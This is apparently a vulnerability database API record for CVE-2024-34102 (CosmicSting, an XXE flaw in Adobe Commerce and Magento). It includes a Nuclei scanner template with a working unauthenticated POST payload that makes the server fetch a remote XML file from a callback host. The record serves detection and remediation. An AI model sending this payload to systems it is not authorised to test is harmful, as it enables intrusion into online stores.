{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-34102/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-34102/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-34102/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-34102/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-34102/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-34102"},"sightings":{"href":"/api/v1/sightings/cve-2024-34102"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-34102.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-34102\n\ninfo:\n  name: Adobe Commerce & Magento - CosmicSting\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n  impact: |\n    Unauthenticated attackers can exploit XXE to achieve arbitrary code execution on Adobe Commerce and Magento instances.\n  remediation: |\n    Update Adobe Commerce to version 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 or later.\n  reference:\n    - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md\n    - https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-34102\n    cwe-id: CWE-611\n    epss-score: 0.99994\n    epss-percentile: 0.99987\n    cpe: cpe:2.3:a:adobe:magento:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: app=\"Adobe-Magento\"\n    product: magento\n    vendor: adobe\n  tags: cve,cve2024,adobe,magento,xxe,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://{{interactsh-url}}/xxe.xml\",\"dataIsURL\":true,\"options\":12345678}}}}}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_any(body, \"log file\", \"cartId\", \"no Route\")'\n          - 'contains(body, \"message\")'\n        condition: and\n# digest: 490a0046304402201a03e2625d001b224ce6c9b5e9df17df964e2e02e0ff138af102ebc4559d0eb00220177d62555403602d329b73f957c4d70c9be52c758b6d2bd44e7190a023a29605:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-34102"}